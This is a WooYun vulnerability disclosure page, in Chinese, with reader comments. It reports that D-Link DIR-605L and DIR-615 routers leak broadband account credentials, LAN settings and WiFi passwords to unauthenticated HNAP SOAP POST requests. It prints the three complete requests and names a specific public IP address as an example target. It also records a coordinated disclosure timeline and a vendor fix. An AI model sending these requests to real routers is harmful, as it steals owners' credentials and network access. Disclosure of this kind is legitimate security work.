当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066906

漏洞标题:D-Link两款路由发送特定POST包获取宽带帐号wifi等密码

相关厂商:D-Link

漏洞作者: YY-2012

提交时间:2014-07-01 21:32

修复时间:2014-09-29 21:34

公开时间:2014-09-29 21:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-01: 细节已通知厂商并且等待厂商处理中
2014-07-05: 厂商已经确认,细节仅向厂商公开
2014-07-08: 细节向第三方安全合作伙伴开放
2014-08-29: 细节向核心白帽子及相关领域专家公开
2014-09-08: 细节向普通白帽子公开
2014-09-18: 细节向实习白帽子公开
2014-09-29: 细节向公众公开

简要描述:

获取外网IP地址直接POST发包可以获取宽带帐号,wifi密码等信息。
如有不服,你他吗的来打我。。

详细说明:

固件版本 : 1.12
硬件版本 : Ax
型号 : DIR-605L
添加:型号 DIR-615同样受影响。
获取宽带帐号等信息

POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 331
SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"
Host: 地址:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetWanSettings>
</soap:Body>
</soap:Envelope>


获取路由内网地址信息

POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 343
SOAPAction: "http://purenetworks.com/HNAP1/GetRouterLanSettings"
Host: 地址:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetRouterLanSettings xmlns="http://purenetworks.com/HNAP1/">
</GetRouterLanSettings>
</soap:Body>
</soap:Envelope>


获取wifi密码等信息

POST /HNAP1/ HTTP/1.0
Connection: keep-alive
Content-Length: 380
SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"
Host: 地址:8080
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/">
<RadioID>2.4GHZ</RadioID>
</GetWLanRadioSecurity>
</soap:Body>
</soap:Envelope>


案例:http://27.45.196.132:8080/

漏洞证明:

1.jpg


2.jpg


3.jpg

修复方案:

。。

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2014-07-05 23:39

厂商回复:

CNVD确认并在多个实例上复现所情况,并与wooyun-2014-一并由CNVD通过公开联系渠道向设备生产厂商友迅电子设备(上海)有限公司通报。生产厂商反馈称新固件已经解决相关问题。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-07-01 21:33 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    沙发》??好紧张

  2. 2014-07-01 21:38 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    @疯狗 编辑了处理下,,暂时发现两款D-Link可以以上操作。

  3. 2014-07-01 22:24 | 小周周 ( 路人 | Rank:8 漏洞数:4 | 请多指教!)

    o.O

  4. 2014-07-02 09:47 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    看起来很吊的样子

  5. 2014-07-02 11:04 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @YY-2012 嗯,都变更了

  6. 2014-07-03 13:52 | 铁蛋火车侠 ( 普通白帽子 | Rank:156 漏洞数:31 | Q群371620085 技术交流群 有漂亮妹纸!)

    前排出售盖伦

  7. 2014-07-03 15:49 | 汪哥 ( 路人 | Rank:28 漏洞数:6 )

    前排

  8. 2015-04-22 12:56 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    想问下GET 可以获得么?header带上,SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"